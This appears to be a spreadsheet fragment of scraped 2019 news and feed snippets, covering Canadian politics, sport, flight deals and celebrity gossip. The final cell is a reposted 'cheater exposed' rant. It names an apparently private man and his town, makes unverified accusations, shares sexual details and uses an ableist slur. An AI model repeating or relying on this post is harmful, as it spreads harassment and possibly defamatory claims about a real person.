    <t>Prime Minister Justin Trudeau has experienced one of the most controversial, bizarre and mind-numbing episodes in Canadian political history. It’s damaged his public image and tarnished his reputation. On Sept. 18, Time magazine released a 2001 photo from a school yearbook that showed Trudeau in brownface. He was a 29-year-old teacher at West Point Grey Academy in Vancouver, B.C., and it reportedly occurred during an Arabian Nights-themed party. How this photo remained buried for so long is a mystery. It was reportedly unearthed by Vancouver businessman Michael Adamson in July. According to Time, he wasn’t at the party but was “part of the West Point Grey Academy community” and felt this photo “should be made public.” Trudeau apologized on his campaign plane to reporters. During the media scrum, he revealed another instance of putting on, in this case, blackface when he sang Day-O (The Banana Boat Song) in high school. CTV’s Evan Solomon and the Globe and Mail’s Robert Fife both circulated this photo on social media within hours. After claiming (albeit not definitively) that these were the only two missteps, a video of a third instance of Trudeau in blackface was revealed the next day. The Liberal Party confirmed it was him. It’s since been determined it occurred in Quebec during a “costume day” for instructors at a whitewater rafting company. Trudeau claims he forgot about this third incident. Whether he really did, or conveniently did, is another issue. He also won’t publicly confirm or deny that he hasn’t worn brownface or blackface since 2001, which can be interpreted in a few ways. This political bombshell has turned into a bomb blast. Trudeau may not survive the carnage he’s created. For a week, the Liberals released old, controversial videos and social media comments made by several Conservative candidates related to topics like abortion and homophobia. Apologies were forthcoming. The Liberals went after Tory Leader Andrew Scheer for defending these candidates after they apologized. They also previously attacked him for a 2005 video where he discussed gay marriage in a controversial fashion. With respect to the latter, Scheer has said his views have evolved, like other Canadians. Trudeau, in turn, is hoping (and no doubt privately praying) Canadians will accept his apology and realization that “now I recognize it was something racist to do.” No one is suggesting Trudeau is a racist. But what he did was racially insensitive – and profoundly stupid. It shows a complete lack of judgment between right and wrong, and hurts his credibility as a supposedly liberal, progressive, feminist and enlightened individual. The scion of a late, former prime minister should have really known better. I’m 49 years old, or about two years older than the PM. I’m more right-wing than he would ever be on his worst day. Nevertheless, there’s not a single moment in my life where I would have ever considered putting on brownface or blackface. I wouldn’t have fathomed for a nanosecond that this long-discredited practice associated with vaudeville would have been regarded as acceptable behaviour, either. What he said is pure, unadulterated rubbish. Nevertheless, most polls show the Tories ahead of the Liberals by a small margin. The former’s popularity was steadily increasing before the brownface/blackface controversy broke, so this appears to be the continuation of an existing trend. That’s neither good nor bad for Scheer’s leadership ambitions and/or Trudeau’s re-election bid. Can Canadians really accept Trudeau’s apology, which would have ended the careers of most Liberal and Tory prime ministers before him? They would be voting for someone who’s being mocked on the domestic front, and laughed at and ridiculed on the international front. Having the confidence that he can still lead a nation when he buries embarrassing moments in his life and hopes they’ll never be discovered is rather troubling, too. What will it say about our country if Trudeau is re-elected after this controversy? That’s something Canadians should seriously think about before Oct. 21. Troy Media columnist and political commentator Michael Taube was a speechwriter for former prime minister Stephen Harper. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Will blackface controversy destroy Trudeau? appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>beatthatflight</t>
  </si>
  <si>
    <t>Big Tiger sale now on, finishes tomorrow at noon. One way domestic flights from most major Tiger ports. Sydney to Gold Coast $45 - 14 Oct - https://bookings.beatthatflight.com.au/flights/syd1410ool1 $45 - 15 Oct - https://bookings.beatthatflight.com.au/flights/syd1510ool1 $45 - 16 Oct - https://bookings.beatthatflight.com.au/flights/syd1610ool1 $46 - 22 Oct - https://bookings.beatthatflight.com.au/flights/syd2210ool1 $48 - 23 Oct - https://bookings.beatthatflight.com.au/flights/syd2310ool1 $48 - 28 Oct - https://bookings.beatthatflight.com.au/flights/syd2810ool1 Gold Coast to Sydney $45 - 16 Oct - https://bookings.beatthatflight.com.au/flights/ool1610syd1 $45 - 30 Oct - https://bookings.beatthatflight.com.au/flights/ool3010syd1 $46 - 23 Oct - https://bookings.beatthatflight.com.au/flights/ool2310syd1 Melbourne to Adelaide $37 - 23 Oct - https://bookings.beatthatflight.com.au/flights/mel2310adl1 (Jetstar) $50 - 17 Oct - https://bookings.beatthatflight.com.au/flights/mel1710adl1 $52 - 22 Oct - https://bookings.beatthatflight.com.au/flights/mel2210adl1 Adelaide to Melbourne $50 - 24 Oct - https://bookings.beatthatflight.com.au/flights/adl2410mel1 $52 - 22 Oct - https://bookings.beatthatflight.com.au/flights/adl2210mel1 Sydney to Brisbane $57 - 17 Oct - https://bookings.beatthatflight.com.au/flights/syd1710bne1 $59 - 15 Oct - https://bookings.beatthatflight.com.au/flights/syd1510bne1 Brisbane to Sydney $66 - 15 Oct - https://bookings.beatthatflight.com.au/flights/bne1510syd1 and many more between Melbourne and Sydney, Brisbane, Adelaide, Coffs Harbour, mostly in October. Beat That Flight For more deals like this from Beat That Flight, visit our site - sign up for updates, deals, flight hacks and error fares, or follow us on Facebook or on twitter. Deals from Sydney, Deals from Melbourne, Deals from Adelaide, Deals from Canberra, Deals from Perth, Deals from Darwin, Deals from Cairns, Deals from Brisbane, Deals from Hobart We have an app now too, if you're on Android! Do you look for flights using Google Chrome?</t>
  </si>
  <si>
    <t>Source: https://www.wired.com/story/best-labor-day-mattress-sales-2019 8 Best Labor Day 2019 Mattress Sales That WIRED Recommends All of our favorite bed-in-a-box mattresses are on sale for Labor Day weekend, including some by Helix, Leesa, and Casper. Source: https://www.wired.com/story/best-labor-day-mattress-sales-2019 The post 8 Best Labor Day 2019 Mattress Sales That WIRED Recommends appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Newspaper says event ‘gives us cause for concern’ after protests outside its officesThe New York Times has scrapped plans to sponsor one of the world’s biggest oil industry conferences after pressure from climate campaigners including Extinction Rebellion.There were protests outside the newspaper’s offices in Manhattan this month over the Oil and Money conference, which is in its 40th year and which green groups have called a “climate crime scene”. Continue reading… Read More</t>
  </si>
  <si>
    <t>Here are the latest digital comics added to indie comics subscription service – including Megatomic Battle Rabbit #4 and lots more! Featured new additions this week include: Megatomic Battle Rabbit #4, Awesome Comics #4, Digitopia 1.0: Displaced Dreams #1, Androsaurs G/N, ‘Hello to Jason Isaacs‘ and ‘But i’m a Cat Person‘ Vol. 5 Read these and 100’s more indie comics now #DiscoverIndieComics The post Megatomic Battle Rabbit, Awesome Comics &amp; More Added To Comichaus appeared first on 3 Million Years.</t>
  </si>
  <si>
    <t>GAME OF THRONES’ ending divided fans and many continue to share their theories about how things could have turned out very differently if a few tweaks had been made. However, now it seems George R R Martin had a whole new ending planned out. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>They’re two of Australia’s most scandalous celebrities. And radio bosses are hoping controversy will translate to on-air chemistry for Jessika Power and Anthony Mundine, who are currently trying to land their own radio show. The pair had a test recording on Monday at Brisbane‘s Hit105 studios with radio personality Cody Schaeffer. Surprise! Radio bosses are hoping controversy will translate to on-air chemistry for Jessika Power and Anthony Mundine, who are in talks for their own radio show Daily Mail Australia understands that producers were testing Jessika and Anthony’s chemistry together for a potential show. A source said that the first recording exceeded expectations, but there’s still some work to do before things move forward. Jessika shared some footage from the recording to Instagram on Monday, which showed herself, Anthony and Cody goofing around in the studio. Owning the airwaves! The pair had a test recording on Monday at Brisbane’s Hit105 studios with radio personality Cody Schaeffer ‘Welcome back to Hit105,’ the MAFS villain said playfully. ‘Welcome back to the Jessika show!’ Daily Mail Australia has contacted Southern Cross Austereo for comment. If Jessika and Anthony’s show is greenlit, it’ll certainly be the edgiest lineup on the usually safe and family-friendly network. Jessika shot to fame earlier this year as the husband-stealing vixen on Married At First Sight. ‘Welcome back to the Jessika show!’ Jessika shared some footage from the recording to Instagram on Monday She’s been in a number of scandals since then, including multiple celebrity feuds and ‘gatecrashing’ the Logie Awards with fellow MAFS villain Ines Basic. However, her image is almost squeaky clean when compared to Mundine. The former professional boxer and NRL star has been in countless controversies over the years, most recently receiving backlash for homophobic comments he made after appearing on I’m a Celebrity… Get Me Out Of Here last year. The aboriginal athlete, who converted to Islam in 1999, said he believed capital punishment is the only way to deter homosexuality which should be ‘behind closed doors, how it used to be’. ‘If we were to live in a society, just like in Aboriginal culture, that homosexuality is forbidden and you do it and the consequences are capital punishment or death, you think you are going to do it? Or think twice about doing it?’ he said. Bad girl: Jessika shot to fame earlier this year as the husband-stealing vixen on Married At First Sight His comments gave a clear view of his firm Muslim beliefs, as homosexuality is banned in Islam, but he later said that the nasty comments were ‘not who I am’. ‘Sometimes my delivery is not the best. I probably said it in a harmful way, and I don’t want to be harmful, I want to be kind,’ he told the Daily Telegraph. ‘I have gay friends and family members who were upset by my comments, they were hurt, and it hurt me to see them hurt.’ Outspoken: Mundine has been in countless controversies over the years</t>
  </si>
  <si>
    <t>Key crossbench senators have condemned union leader John Setka's remarks over their response to the government's industrial relations bill.</t>
  </si>
  <si>
    <t>Welcome to the latest round-up of the Fantasy Football Scout mini-leagues and community competitions. This article covers Gameweek ...</t>
  </si>
  <si>
    <t>No managers have been fired by major-league teams this season but that is about to change — in a big way. Source: Sports Business News</t>
  </si>
  <si>
    <t>Nat Young thinks Jeffrey Eugenides' Middlesex is the perfect novel.</t>
  </si>
  <si>
    <t>Michaela Whitbourn</t>
  </si>
  <si>
    <t>The Tax Office is pursuing the exiled billionaire for $140 million and has served debt-collecting notices on casinos in Sydney and Melbourne.</t>
  </si>
  <si>
    <t>Pretty good deals for the two games. Obviously limited stock as it is a clearance so you need to check your local stores. If delivery is available, there will be postage fees which probably depend on your location. Star Wars Battlefront II (PS4): https://www.harveynorman.com.au/star-wars-battlefront-2-ps4.... Enjoy!</t>
  </si>
  <si>
    <t>The Adelaide Crows’ disastrous slide since the 2017 Grand Final has left Don Pyke “frustrated” and admitting he is to blame after stepping down as coach.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/25/project-a-iii/ Project A, the Berlin-based VC, raises $200M fund to back seed and Series A European startups Project A, the Berlin-based VC that backs startups in Europe at seed and Series A stage, has raised a new $200 million fund (€180 million). This brings total assets under management to $486 million (€440 million) and is the third fund Project A has raised. The venture capital firm, whose investments include the likes of WorldRemit, Catawiki, Voi and Uberall, is also announcing it will now have a presence in London and Stockholm in order to put people on the ground in what it says are “two of its favourite ecosystems.” Meanwhile, it is just over two years since Project A raised its last fund. Fund two sat at €140 million, so this new fund is a slight increase in size — as is the initial cheque size the VC plans to write out of fund three: “up to $7 million,” the firm says. “We are pleased that our approach as an operational venture capital investor convinces both startups and co-investors. Over the next few years, the new fund will enable us to continue backing passionate European founders and their teams at Seed and A stages – working both on B2B as well as B2C innovations,” says Thies Sander, General Partner at Project A, in a statement. Describing itself as the only European “Operational VC” — which is highly debatable, given that tons of European VCs offer operational support and have partners that are ex-founders with exits behind them — Project A says its portfolio companies receive support from 100 “functional experts” in engineering, marketing, product, design, communications, business intelligence, sales &amp; customer success, organizational building and hiring. “Project A can provide support in all critical functions across the entire startup building stack, at all stages of a founding teams’ startup journey,” says the Berlin-based firm. Sectors that Project A plans to invest span fintech, digital health, proptech, Industry 4.0, enterprise software, mobility and logistics — all areas in which the VC says it has “deep expertise,” and where European startups are uniquely positioned to build “transformational” global businesses. And it is certainly true that these are sectors where European startups are punching above their weight, which hasn’t gone unnoticed by venture firms and LPs in the U.S. In fact, with fund three, it is the first time that Project A has attracted LPs from the U.S., with Top Tier Capital Partners now a backer. Cue a statement from Florian Heinemann, general partner at Project A: “The European digital ecosystem matured enormously within a few years. We see more and more ambitious serial entrepreneurs working on groundbreaking product innovations based on their experience in the established economy combined with their prior expertise. We also see more and more competence-driven acquisitions and strongly believe that they will increase significantly over the next few years.” Source: https://techcrunch.com/2019/09/25/project-a-iii/ The post Project A, the Berlin-based VC, raises $200M fund to back seed and Series A European startups appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Matthew Cauz</t>
  </si>
  <si>
    <t>“Calgary is going to have to find some way, devise a way to kick more than field goals though.” That was the quote from TSN broadcaster Rod Black right before Hamilton’s Lirim Hajrullahu missed a 48 yard field goal that, if he had been successful, you may not be reading this column. The Calgary Stampeders’ 19-18 win over the Hamilton Tiger-Cats will be remembered for many things. Tre Roberson’s game winning blocked field goal, Bo Levi Mitchell maintaining his undefeated streak against the Tiger-Cats, Bralon Addison and Brandon Banks combining for 272 total yards, or the bigger picture of Hamilton once again finding new and torturous ways to lose to the Stamps. But for me, what sticks out is that soon after Rod Black made that proclamation, Bo Levi Mitchell again demonstrated to the rest of the CFL why he is the best in the business. Calgary had been outplayed for much of the game and found themselves trailing 18-12 early in the fourth quarter when Mitchell put together a vintage touchdown drive, going 5-of-6 for 78 yards and the winning touchdown pass. Before this drive it had been a sub-standard performance for the two-time CFL MOP, barely completing 50 per cent of his passes (18-of-33, 256 yards) and beyond hooking up a couple times with Reginald Begelton the offence had kind of sleepwalked its way to 12 points early in the fourth quarter against a Tabbies D that was second in the league in offensive points given up. SHAW ROAD TO THE GREY CUP » View standings » Nissan Titan Power Rankings » Breaking down Roberson’s block Clichés like “gamer” or “money quarterback” are often overused and sometimes we throw around these terms without really knowing what they mean. On Saturday afternoon Mitchell (and the entire offence) showed exactly what a clutch drive looks like to send the fans home happy on a sunny Saturday afternoon. Watching it live you could feel it after a couple plays, that sense of inevitable. Call it a combination of Mitchell’s skill set and Hamilton’s past against this team and you just knew the final play would be a bunch of Stamps skill position players celebrating in the end zone. Mitchell’s first completion was without a doubt the best on this journey. Facing a second and 10, with Simoni Lawrence timing his blitz to get right in his face a moment before the ball was released, Mitchell still managed to hit Begelton right in the hands. It should be noted that Begelton was double covered, and well defended at that. This wasn’t the case of Mitchell reading the blitz and hitting a wide open receiver. The pass needed to be right on target or it easily would have been knocked away, or worse. Hard to find a more impressive 12 yard completion. Can I start a GoFundMe page to raise money to ensure that Begelton stays in Canada? I want the Mitchell to Begelton connection in my CFL life for as long as possible. After that it was surgical for the Calgary offence. A quick hitter to an open Colton Hunchak in the slot for a first down. Three plays later Mitchell rolling out to his right, directing traffic and spotting a wide open Begelton, hitting him stride by throwing across his body. That is the kind of dangerous throw that is a big no-no for many quarterbacks, but then again most passers in this league aren’t Mitchell. At this point we all knew what was coming (be honest Hamilton fans, you sensed a touchdown was coming), and it did on the next play from the 15 yard line as Mitchell faked the run, surveyed the field and spotted Eric Rogers with a slight step one-on-one against Mike Daly. Touchdown. For the first time Calgary would have the lead, a lead they would not relinquish. Now, I will take a moment from my predictable quarterback worship to put some context on the hero quarterback narrative. Calgary’s offensive line protected Mitchell like it was their own mothers playing quarterback. From Derek Dennis on the left side to Nila Kasitati on the right to everyone in the middle, Bo was given a consistent clean pocket. On the go ahead touchdown to Rogers Mitchell had just under four seconds to find his target. On the other side of the ball, Mitchell would never have been given the opportunity to play the role of hero without Calgary’s defence blanking Hamilton’s offence in the second half, which included key sacks by Cordarro Law and Derek Wiggan. As for Hamilton, you have to feel sorry for a team that for much of the game looked like and played like the superior team, out gaining Calgary in total yards and first downs and holding a slight advantage in time of possession. Of course when you throw up a minus four in the turnover battle at McMahon Stadium your chances of winning are slim at best. The Ticats had their chances to end Bo Levi Mitchell’s win streak against them. Had their defence not dropped a couple passes maybe we would have been talking about the Tiger-Cats slaying the dragon by making Mitchell look ordinary. Certainly it was in play. But in the end we are left with a familiar story with the two-time Grey Cup Champ once again playing the role of conquering hero.</t>
  </si>
  <si>
    <t>Aubameyang caps comeback from 10-man Arsenal to beat Villa Ten-man Arsenal twice came from a goal down to claim a much-needed 3-2 win over Aston Villa in dramatic fashion thanks to Pierre-Emerick Aubameyang’s free-kick six minutes from time at the Emirates on Sunday. The Gunners’ winless run in the Premier League seemed set to stretch to four games when John McGinn gave Villa the lead and Ainsley Maitland-Niles’s sending-off four minutes before half-time gave Unai Emery’s men a mountain to climb. Nicolas Pepe’s first Arsenal goal from the penalty spot briefly brought the Gunners level, but Wesley soon restored Villa’s lead. Arsenal heart and commitment was questioned after blowing a two-goal lead to draw at Watford last weekend. But they showed no little spirit as Calum Chambers looped home an equaliser before Aubameyang took centre stage to rifle home a free-kick from the edge of the area. A vital three points, which lifts Arsenal up to fourth, is a huge boost for Emery, who has faced questions in recent weeks over his ability to lead the Gunners back to the Champions League next season. The Spaniard still has to find the right balance in midfield to protect an ailing defence, but with Aubameyang and Pepe in attack, Arsenal always look capable of scoring. Maitland-Niles’s nightmare afternoon began after barely a minute when he blazed over Arsenal‘s best chance of the first half. The right-back then dragged down Anwar El Ghazi for an early booking that was to prove costly. McGinn was a constant threat to the Arsenal defence as the Scottish international twice tested Bernd Leno from outside the box. However, the hosts did not heed those warning shots as McGinn was allowed to ghost in at the far post to turn home El Ghazi’s cross on 20 minutes. Maitland-Niles then naively dived into a sliding challenge with Neil Taylor and saw a second yellow. Emery sacrificed 18-year-old Buyako Saka on his first Premier League start for Chambers to fill the void at right-back. And the hosts were handed a lifeline just before the hour mark when Matteo Guendouzi was bundled over in the box by Bjorn Engels. Aubameyang stood aside to let Pepe net his first goal since joining Arsenal for a £72 million ($87 million) club-record move from Lille. But Arsenal‘s joy did not last long as their leaky defence was breached easily once more. Jack Grealish galloped freely through the midfield before squaring for Wesley to prod in at the near post. Arsenal almost responded once more as Tom Heaton turned Guendouzi’s long-range drive onto the post. Heaton also tipped over David Luiz’s dipping free-kick, while Aubameyang could not turn Sokratis Papastathopoulos’s knockdown on target. However, Chambers was in the right place nine minutes from time to score his first Arsenal goal since 2016. In a topsy-turvy start to the season, Aubameyang has been the man Arsenal can rely on and he stepped forward again to win the game with his seventh goal of the season by drilling a free-kick he won beyond the unsighted Heaton. This post Aubameyang caps comeback from 10-man Arsenal to beat Villa appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>The following statement is from the Fairfax NAACP regarding this appalling story: Fairfax County police are investigating an alleged attack on a sixth-grade girl by three boys Monday at the private Christian school they attend in Springfield, Va. The 12-year-old girl, who is African American, told police that three white sixth-grade classmates held her down, covered her mouth, called her insulting names and used scissors to cut several of her dreadlocks from her head during recess in the playground at Immanuel Christian School. ************************************* Fairfax County NAACP is at Immanuel Christian School. Springfield Fairfax NAACP’s full statement on the racist bullying incident at Immanuel Christian School in Springfield: FAIRFAX, Va. – The Fairfax County NAACP is closely monitoring the situation at Immanuel Christian School in Springfield, Va. We would like to know what the school’s existing policy is on racism and bullying. We also expect the administration to take immediate disciplinary action against the students in question. Black students are too often the victims of racial bullying that is ignored or handled improperly. Amari Allen alleges she was bullied since the beginning of the school year without any action being taken. According to Amari’s account, the bullying escalated to a brutal, racist assault on a young girl by group of boys who previously harassed her without consequences. Immanuel Christian School must stand up for its students and immediately institute a zero tolerance policy for racism, discrimination, and harassment, especially when it rises to the level of assault. In many ways, Fairfax County is a progressive and welcoming place to live. However, in the shadow of schools, highways, and institutions named after slavers, people of color have been targeted for discrimination and harassment far too often. The Fairfax NAACP is already investigating at least two alleged racist incidents at Herndon Middle School where the administration did not follow the district’s bullying policy. In a community as diverse as ours, children should be able to attend school without the fear of racist bullying, and focus on their education. Students must also have confidence that school administrators—public or private—will enforce their policies to protect them. Amari Allen, a straight A student and violinist, should be able to return to the school she loves tomorrow with the support of her fellow students, teachers, and faculty</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</si>
  <si>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Germany's Merkel to work with Italy's populist new govt by USA Consumer Credit Counseling, Felipe Escobar on Wednesday 04 September 2019 08:27 AM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Germany's Merkel to work with Italy's populist new govt Wednesday 04 September 2019 08:03 AM UTC-05 | Tags: consumer-credit-counseling-service https://m.youtube.com/watch?v=xYGTJzP2SQw German Chancellor Angela Merkel says she will approach Italy's populist new government with an open mind and try to work with it instead of speculating about its intentions. Tags: Southfield, Michigan Consumer Credit Counseling Service | (888) 551-1270 via Germany's Merkel to work with Italy's populist new govt September 04, 2019 at 07:52AM Copyright © September 04, 2019 at 07:52AM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>xXx RETURN OF XANDER CAGE was a huge success – and once the fourth instalment is up and running it will no doubt be the same. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>Desperate Housewives star Felicity Huffman has been sentenced to 14 days jail for her role in a college admissions scandal.</t>
  </si>
  <si>
    <t>MUDIK TRIP 2019, #Lubuk_Alung 2 Juli 2019 The post MUDIK TRIP 2019, #Lubuk_Alung 2 Juli 2019 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The gap between Britain and the EU over Brexit is "very wide", Irish Prime Minister Leo Varadkar says, and the British government's Northern Irish allies poured cold water on suggestions the contentious border "backstop" could be reworked.</t>
  </si>
  <si>
    <t>Lando Norris is raring to go for his first experience of racing at the Marina Bay Street Circuit in Singapore this weekend. The rookie has scored only three points in the last five races for McLaren F1 Team but his overall performances have been a talking point in what has been an excellent 2019 season in Formula 1 for the youngest driver on the grid. Norris will be one of four drivers to head to Marina Bay with no previous racing experience but is prepared for the hot temperatures in arguably the most enduring event on the calendar. “I’m excited to head to Singapore for the first time and I’ve been doing a lot of prep back in the factory to get ready for the weekend,” Norris said. “From my work in the simulator, the street circuit seems to be an exciting challenge and I’m really looking forward to my first laps on Friday. I’ll be heading out to Singapore a few days early so I can get used to the temperatures with some specialist training, take in some of the city and prepare myself for the weekend ahead.” Norris sits fourteenth in the Drivers’ Championship on twenty-five points, less than half the amount of team-mate Carlos Sainz Jr. in seventh. The Brit has also achieved a best result of sixth on two occasions this campaign in Austria and in the other night race that was held this year in Bahrain.</t>
  </si>
  <si>
    <t>Ciaran Kelly</t>
  </si>
  <si>
    <t>Newcastle United were held to a 1-1 draw by winless Watford at St James’ Park in their fourth league game under Steve Bruce This post written by Ciaran Kelly originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>Utopian legislators in the United States often look with rose-tinted glasses upon the Canadian approach to everything, from higher education and medical care to global warming and international affairs. Since Canadians are the ones who live with such policies, they’re more inclined to recognize their mistakes and reverse the course, as exhibited by Alberta’s carbon tax. The repeal of the carbon tax in Alberta has had one indisputable beneficiary: Albertans. Premier Jason Kenney introduced the repeal bill in May as one of his first actions in office, arguing the tax imposed on families an undue burden with no significant environmental benefit. The carbon-pricing scheme was supposed to decrease fossil-fuel consumption and provide incentives to use alternative energy. But over the course of a single year, it cost individuals $286 and couples $388, on average. Couples with two children paid $508. And these stiff prices didn’t account for indirect burdens arising through more expensive groceries further inflated by higher transportation costs to the Prairie province. As well, the carbon tax, which went into effect in 2017, set back Alberta businesses by $1.4 billion per year, a downer for investment and job growth. The repeal, however, may not be the final word on the matter. A federal Liberal government would impose a carbon tax on Alberta on Jan. 1, 2020 – in the same way it has done with Saskatchewan, Manitoba, Ontario and New Brunswick. In these four provinces, in 2019, the federal carbon tax started at $20 per tonne of carbon emitted. This means an additional 4.4 cents per litre of gas, and the tax is scheduled to increase annually until it reaches 11 cents per litre in 2022, or $50 per tonne. The Albertan government has vowed to challenge the federal imposition in court when the time comes, even though Ontario and Saskatchewan had previously failed in that endeavour. A study by the Canadian Taxpayers Federation shows Canadians pay on average 34 per cent of the pump price in taxes. And they pay sales tax on the excise and carbon taxes when buying gasoline. This tax on tax adds 3.4 cents per litre, making the combined total tax burden range from around 34 cents per litre in Manitoba to almost 55 cents per litre in Quebec. Australian elected officials acknowledged the lack of affordability of misguided clean-energy initiatives when they killed their own carbon tax in 2014. Repealing it cut over 1,000 pages of red tape, and reduced retail energy costs by nine per cent, average household costs by $500 per year and business compliance costs by tens of millions. Further, the repeal boosted the country’s economic growth and international competitiveness. The major problem with carbon-tax schemes is they fail to deliver. Allegedly, the motive is not to increase fiscal revenue but to make pollution substantially costlier than emissions-saving sources and technologies. However, governments end up raking in billions while making life harder for families and businesses, with minuscule or nonexistent environmental benefits. In Australia, the carbon tax decreased emissions by only 1.4 per cent in the second year while increasing energy prices by 10 per cent for the average family. The hike was even more significant for small and medium-sized businesses, since carbon costs and other so-called green schemes constituted up to one-third of their energy bills. Proponents might be well intentioned, but Australians, as well as Albertans, have paid the price directly for what they saw as an insufficient gain. Alberta’s repeal is in line with wanting both economic prosperity and environmental protection: without the former, we can’t have the latter. The continued push to burden voters in Australia led to a surprise loss for the Labour Party down under. Daniel Wild, director of economics at the Melbourne-based Institute of Public Affairs, opined in the election lead-up that “the interests of the out-of-touch elite has taken precedent,” as they have across Canada. Rather than mandating changes and taxing constituents, legislators would be better off focusing on how to provide a business-friendly jurisdiction. Innovation would then thrive as we are transitioning to a more environmentally-friendly economy. The Stone Age didn’t end because mankind ran out of stones; we simply found better and cheaper substitutes. Likewise, fossil fuels will predominate until they are no longer economically advantageous. Most inhabitants of this world, especially those in poor countries, still rely on coal and petroleum to power their homes, hospitals and schools. Severe impediments to these energy sources, without readily available alternatives, are heartless and inefficient – akin to asking the poor to remain poor. A scientific paper in Nature: Climate Change notes that China, India, Germany and the United States have all been substituting coal with natural gas in power plants. This transition, which can take place without stiff intervention, has enabled lower carbon emissions with minimal, if any, penalties on families and businesses. If more efficient green-energy sources are available at competitive prices, people will prefer them. The solution is not in making fossil fuels more expensive, or in dictating policies from the federal government, but in rendering clean energy cheaper. Fergus Hodgson is a research associate with the Frontier Centre for Public Policy. Mauricio Bento contributed to this article. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Alberta’s repeal of carbon tax makes economic, environmental sense appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Ganot eager to get to work with his Rainbow Warriors on Friday Original Source After four months of the NCAA’s version of intermittent fasting, coach Eran Ganot is hungrily awaiting the Hawaii basketball team’s opening of preseason training on Friday. “I haven’t been able to sleep as much because I’m kind of excited about it,” Ganot said. “I’m excited about finally getting to work with (the players) more.” For most of the offseason, the NCAA limits the basketball time between coaches and players. “I love the game, I love coaching, and you get only four hours (each week) of basketball with the guys since, basically, last March,” Ganot said. “And now on Friday, we get 20 hours. We’re very excited.” The Rainbow Warriors will convene with a rebooted roster and, perhaps, a restructured game plan. Following the 2018-19 season, three players graduated (forward Jack Purchase and guards Brocke Stepteau and Sheriff Drammeh), two transferred (Brandon Thomas and Leland Green), and the offensive coordinator (Adam Jacobsen) accepted a coaching job at Cal Baptist. Chris Gerlufsen, who coached the previous four seasons at San Diego, replaced Jacobsen. The ’Bows signed three guards — 6-5 Junior Madut, 5-11 Ahmed Ali and 6-3 Justin Webster — and 6-9 forward Bernardo da Silva. Two former state players of the year — Jessiya Villa and Kameron Ng — also joined. Villa, a Kahuku High graduate who signed in 2017, recently completed a two-year church mission. Ng, a 2019 Saint Francis School graduate, is a walk-on. The ’Bows will be without Madut until January. The NCAA recently approved a hardship waiver that will allow Madut to enroll for the spring semester. It has not been determined if Madut, who has three years to play two seasons, will redshirt in the spring. Madut was born in South Sudan, grew up in Australia, attended a prep school in Florida, and played the past two seasons at Eastern Florida State College. The waiver was necessitated because Madut spent time tending to a family situation after high school. “You have to go through the process of that,” Ganot said of the appeal. “We did. And he got the hardship waiver.” Ali and Webster should help replenish the ’Bows’ outside shooting. Last season, Purchase, Stepteau and Drammeh combined to hit 54.1% of the ’Bows’ made 3s. Ali, who started 24 games for Washington State the past season, hit 42.6% of his 3s in junior college and once scored 103 points in a high school game. Webster averaged 16.2 points per game for Hargrave Military Academy, a boarding school in Chatham, Va. Ali can provide offense as part of the backcourt rotation with point guard Drew Buggs (5.9 assists per game) and Eddie Stansberry (35.8% on 3s). At 6-6 and 6-5, respectively, Samuta Avea and Justin Hemsley offer the option of a tall wing in the physical mold of 6-7 Noah Allen three years ago. “We can still play a three-guard lineup, but you might see more of a traditional 3 man at the wing,” Ganot said. “Hemsley and Muta are strong wings.” Last season, the ’Bows tweaked the offense to utilize Purchase’s accurate passing. Purchase, at 6-9, often would circle to the top of the key as a point forward. This season’s plan is to flex 6-8 Zigmars Raimo, who battled inside as a center, to power forward. The move would give UH another screen setter, strengthen the low post, and allow the three 7-footers — Mate Colina, Dawson Carper and Owen Hulland — to rotate at center. “Our inside-out, our extra passing, the unselfishness, that won’t change,” Ganot said of the new wrinkles to the offense. “You could see us being better on the offensive boards, better inside, bigger presence on the rim.” Ganot said da Silva, a 6-9 forward from Brazil who helped Wasatch Academy (Utah) to a national top-10 ranking this past season, adds an extra dimension to the team. “He’s going to be good,” Ganot said. “It’s a matter of when, not if. His approach, his motor, he gives us a different presence. He’s altering shots. He’s athletic. We’re talking about a 7-2 wingspan. He works so hard. He wants to be good.”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‘309252323293891’); fbq(‘track’, ‘PageView’); (function() var _fbq = window._fbq )(); window._fbq = window._fbq || []; window._fbq.push([‘track’, ‘6023141238775’, ‘value’:’0.00′,’currency’:’USD’]);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Ganot eager to get to work with his Rainbow Warriors on Friday appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Bella Caledonia Editor</t>
  </si>
  <si>
    <t>THE NEXT HOUSING BUBBLE A friend in Leith complains about yet another planning application locally to build student flats. Edinburgh is drowning not just under the weight of excess tourist numbers but also of students colonising the centre of the city. I’m all in favour of universities, but the vast growth in higher education in […] The post Blackrock and Housing Bubbles appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Admitted cheating the week his grandma died, good for him to wait till after she kicked the bucket. I suspected him cheating after seeing some e-mails and he would always say he would never cheat and he didn’t want to be like his father cuz his father cheated on his mom but he is the same douchbag cheating *** as his dad. Months after we broke up he writes me an e-mail apologizing and I had a right to be suspicious, no *** sherlock. Now he’s dating some girl that looks like she has *** on her face. He’s also into crazy bondage *** that would scare the c**p out of any normal being. Also, he has this retarded lisp and sounds like daffy the duck. He wasted 4 years of my life, but it’s ok now cuz I found someone that respects me and I trust. Don’t waste your time on him, he’s a good liar The post David Herzweig — Astoria, Oregon appeared first on Expose Homewreckers. The post David Herzweig — Astoria, Oregon appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
